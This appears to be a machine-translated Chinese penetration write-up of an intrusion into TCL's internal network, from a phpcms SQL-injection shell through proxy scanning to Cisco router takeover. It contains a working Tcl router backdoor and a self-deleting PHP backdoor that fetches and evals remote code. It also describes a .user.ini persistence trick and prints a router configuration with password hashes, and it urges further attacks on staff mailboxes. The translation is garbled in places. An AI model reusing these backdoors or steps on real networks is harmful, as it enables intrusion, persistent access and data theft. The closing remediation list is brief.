Measure the test taker's knowledge about a vulnerability in TCL. Internal network penetration Teaching: internal network information detection and post-penetration preparation

Measure the test taker's knowledge about a vulnerability in TCL. Internal network penetration Teaching: internal network information detection and post-penetration preparation

I was planning to send the message to Renren, but what I was forced to do was that I just got out of the Intranet and the server went down. Let's wait for the next case to send the message to Renren or other vendors.

In Intranet penetration, intranet information detection is crucial to your penetration work. If you can understand the target intranet information, it is like enabling god mode.
In this case, we will introduce several basic internal network detection methods and how to connect the eight martial arts in practice to obtain the god mode.

In general, the web Service is split

Url: bit.tcl.com

Getshell is very simple. For phpcms, the old hole in a Phpcms V9 uc api SQL is directly getshell. To get the shell, the permission is high. system

View Nic Information
 

There is only one network card, which is in the private network address of 10.4.22

Here, if we want to penetrate the Intranet through this machine, the first task is to conduct Intranet detection. Here are several methods

0x00 if you only need to penetrate the Intranet business host, you can first check hosts to target the host penetration in hosts.

0x01 if you want to penetrate the entire C-segment host, the complete and convenient method is to scan. here we need to perform an intranet proxy and then scan

Forward proxy or reverse proxy. Because the host cannot connect to the Internet, we select forward proxy.

Upload the proxy script, and then use regerog's dedicated proxy Link (regeorg needs urllib3, so you need to install this module first)
 

Use nmap for proxy scanning. You can use proxychains or proxycap in win.

Because the port we specified here is 2333, modify the conf of proxychains.
 

To test the C-segment information of the Intranet.

0x02 of course, only scanning does not allow us to obtain the most comprehensive information, or the most comprehensive information, that is, we have obtained the Intranet topology, Or I directly went to the vro on a daily basis.



Router, go to you ~

Through the previous nmap scan, we probably know the host of the open web service.
 

After accessing the three hosts at 11, 12, and 13, the cisco router is available for web management. The default password cisco successfully enters
 

The cisco Route for open web management can execute commands on the web end, but our routing permission is only 1. cisco's permission classification is probably like this:

The Administrator is 7, but has 15 levels of permissions. The 15 permissions are basically what they want.

Here, because the current route ios version is
 

Earlier versions of iOS can use an old hole in the past to perform cisco Route elevation.

Because on the web end, you can use privilege15 for command operations.
 

In this way, we have a privilege15 user. Please telnet to the route and check the configuration. We will be pleasantly surprised.
 

We did get the privilege15 user.

So, check the route configuration.

DZSW-3560-A#enenDZSW-3560-A#show running-configshow running-configBuilding configuration...Current configuration : 3678 bytes!version 12.2no service padservice timestamps debug uptimeservice timestamps log uptimeservice password-encryption!hostname DZSW-3560-A!enable password 7 121A0C041104!username admin privilege 15 password 7 1543595F507F7Dno aaa new-modelsystem mtu routing 1500vtp mode transparentip subnet-zeroip routing!!!! --More--!!no file verify autospanning-tree mode pvstspanning-tree extend system-id!vlan internal allocation policy ascending!vlan 218 name Call_Center!vlan 220!vlan 222 name WEB!vlan 223 name DB!!interface Port-channel1 switchport trunk encapsulation dot1q switchport mode trunk!interface Port-channel2 description Connect_To_YDBFZX-C3750_Po1 no switchport ip address 10.68.3.2 255.255.255.252!interface GigabitEthernet0/1 switchport access vlan 218 switchport mode access!interface GigabitEthernet0/2 switchport access vlan 222 switchport mode access!interface GigabitEthernet0/3 switchport access vlan 222 switchport mode access!interface GigabitEthernet0/4 switchport access vlan 222 switchport mode access!interface GigabitEthernet0/5 switchport access vlan 222 switchport mode access!interface GigabitEthernet0/6 switchport access vlan 222 switchport mode access!interface GigabitEthernet0/7 switchport access vlan 222 switchport mode access!interface GigabitEthernet0/8 switchport access vlan 222 switchport mode access!interface GigabitEthernet0/9 switchport access vlan 222 switchport mode access!interface GigabitEthernet0/10 switchport access vlan 222 switchport mode access!

Several services, DB, and office vlan, are on the verge of survival.

The same is true for the other two routes.

==========================================

Some people asked me what to do if I am not satisfied with the competition in web vlan. If I am a hacker, what should I do if I want to go to the office vlan ~ Now that we all have control over the route, of course we can proceed!

I consulted z8 because I am not an O & M dog. He told me, boy, have you heard of the GRE tunnel ~

GRE is the most traditional tunnel protocol. Its fundamental function is to implement the tunnel function. The two remote networks connected through the tunnel are like direct connections, GRE simulates a direct connection link between two remote networks to achieve direct connection between networks.

Http://itchenyi.blog.51cto.com/4745638/1137143

Http://www.codesky.net/article/201207/171461.html

You can refer to these two places

Through the GRE tunnel configuration, we can go to another vlan to make trouble ~

(Keep yourself on the first line. If you meet each other in the future, you will not be able to use the vlan of call_center. The idea of penetrating the network segment is the same as described earlier)



======================

Some people raised their hands again. If my penetration targets cannot be completed in a short time and need to be penetrated later, how can I make it easier for me to penetrate later?

Okay, you are very tricky. Here are some of the frequently used webshells in our work.

First of all, we must give priority to the cisco routing backdoor.

The cisco router supports the TCL cisco script, so our backdoor is also completed through this

# TclShell.tcl v0.1 by Andy Davis, IRM 2007## IRM accepts no responsibility for the misuse of this code# It is provided for demonstration purposes onlyproc callback {sock addr port} {  fconfigure $sock -translation lf -buffering line  puts $sock " "  puts $sock "---|---|---|---|---|---|---|---|---|---|---|---|-"  puts $sock "TclShell v0.1 by Andy Davis, IRM 2007"  puts $sock "---|---|---|---|---|---|---|---|---|---|---|---|-"  puts $sock " "  set response [exec "sh ver | inc IOS"]  puts $sock $response  set response [exec "sh priv"]  puts $sock $response  puts $sock " "  puts $sock "Enter IOS command:"  fileevent $sock readable [list echo $sock]  }  proc echo {sock} {  global var  if {[eof $sock] || [catch {gets $sock line}]} {  } else {  set response [exec "$line"]  puts $sock $response  }  }  set port 1234  set sh [socket -server callback $port]  vwait var  close $sh

This is a backdoor written by a foreigner. Enable the tclsh mode in the routing, and then introduce the backdoor script.



Router # tclsh



Router (tcl) # source tftp: // x. x/backdoor. tcl



In this way, we will leave a backdoor. The next link can be directly connected to the machine in the network segment.

Nc Route ip 1234 (the port is modified in the backdoor script)

Okay. If the web entry is broken, it's all useless. So we should leave a hidden backdoor to the web machine.

Two. One is a file-like backdoor.

This method has been mentioned before by phinthon. It is to leave a backdoor through php. ini or user. ini.

Create a. user. ini file in a directory with a normal PHP file.

Content is

Auto_prepend_file1_xxx.gif (png/jpg) and so on

And your xxx.gif is your backdoor.

See http://drops.wooyun.org/tips/3424 for details



The second method is non-file-shaped backdoors. These backdoors are very concealed and cannot be found by common network administrators. However, there is a very big drawback: restart, or the process is interrupted and the backdoor disappears.

The principle is probably: the first line of backdoor code deletes itself, and then stores it in the background memory, waiting for external links

<?phpunlink($_SERVER['SCRIPT_FILENAME']);ignore_user_abort(true);set_time_limit(0);$remote_file = 'http://xxx/xxx.txt';while($code = file_get_contents($remote_file)){  @eval($code);  sleep(5);};?>

Write your backdoor code in xxx.txt. After accessing the code, you will delete yourself and execute the txt code cyclically. This is something someone has previously written.

Ztz has recently written a better file-free backdoor. You need to go to him.

In addition, if the host is linux, you can also use crontab, Which pig said some time ago, as a backdoor.

Let's take a rough summary of this penetration. First, we split the entry through external services and used a proxy to detect the Intranet and discovered cisco routes. Therefore, we used the previous vulnerabilities to escalate permissions, after the router is completed, the entire vlan division is exposed and god mode is enabled.



This is a conceptual test, so the scale cannot be too large. However, if I am a hacker, what I will do next:

Tunna is used to forward 3389 outbound Internet connections (however, in this scenario, the outbound Internet limits some ports, but you can query dns. We should use port multiplexing ), expanded results after Remote Desktop (sniffing other machines)

After reading the database, we can see a lot of tcl employee user data, which can directly attack tcl's enterprise mailbox
 

 

Solution:

External Services, patch in time, and control permissions

Weak Intranet Password

Patch Intranet hosts in time

Timely upgrade of vrouters